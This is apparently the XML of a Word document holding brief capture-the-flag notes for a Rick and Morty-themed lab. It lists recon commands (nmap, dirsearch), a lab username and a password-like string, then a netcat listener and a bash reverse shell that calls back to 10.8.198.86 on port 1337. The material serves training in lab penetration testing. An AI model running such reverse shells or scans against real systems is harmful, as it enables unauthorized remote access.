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C8EC" w14:textId="0DA54013" w:rsidR="00D07DBE" w:rsidRDefault="0047739A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0047739A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0047739A">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0047739A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>10.10.46.48  -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>vv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1797DC31" w14:textId="3A3E8CC5" w:rsidR="0047739A" w:rsidRDefault="0047739A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0047739A">
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0047739A">
        <w:t xml:space="preserve"> -u 10.10.46.48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FA1A01" w14:textId="77777777" w:rsidR="003338E0" w:rsidRPr="003338E0" w:rsidRDefault="003338E0" w:rsidP="00333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38E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Username: R1ckRul3s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CCA42D" w14:textId="77777777" w:rsidR="00973413" w:rsidRDefault="00973413" w:rsidP="00973413">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/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Wubbalubbadubdub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0CAB405B" w14:textId="39842BE8" w:rsidR="003338E0" w:rsidRDefault="00AF68E2">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00FD61E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.46.48/login.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47150F6F" w14:textId="7E68A6F9" w:rsidR="00AF68E2" w:rsidRDefault="00AF68E2">
      <w:r>
        <w:t>execute (commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA87A9" w14:textId="3AA120FD" w:rsidR="00AF68E2" w:rsidRDefault="00AF68E2">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480DB7BA" w14:textId="5CF9B416" w:rsidR="00AF68E2" w:rsidRDefault="00AF68E2">
      <w:r>
        <w:t>bash -c 'exec bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &amp;&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/10.8.198.86/1337 &lt;&amp;1'</w:t>
      </w:r>
      <w:r w:rsidR="00A0340B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A0340B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00693FC4">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00A0340B">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A0340B">
        <w:t>execute commands in execute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEB308" w14:textId="24E49625" w:rsidR="00F44187" w:rsidRDefault="00F4418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04CAAD2" w14:textId="77777777" w:rsidR="00AF68E2" w:rsidRDefault="00AF68E2"/>
    <w:sectPr w:rsidR="00AF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34"/>
    <w:rsid w:val="003338E0"/>
    <w:rsid w:val="0047739A"/>
    <w:rsid w:val="00632134"/>
    <w:rsid w:val="00693FC4"/>
    <w:rsid w:val="00973413"/>
    <w:rsid w:val="00995B3B"/>
    <w:rsid w:val="00A0340B"/>
    <w:rsid w:val="00AF68E2"/>
    <w:rsid w:val="00D07DBE"/>
    <w:rsid w:val="00E400DF"/>
    <w:rsid w:val="00E96022"/>
    <w:rsid w:val="00F4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F031"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0677335A-3668-4636-8DD7-CF12D709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8E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3338E0"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AF6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46.48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2023-12-01T16:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T17:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>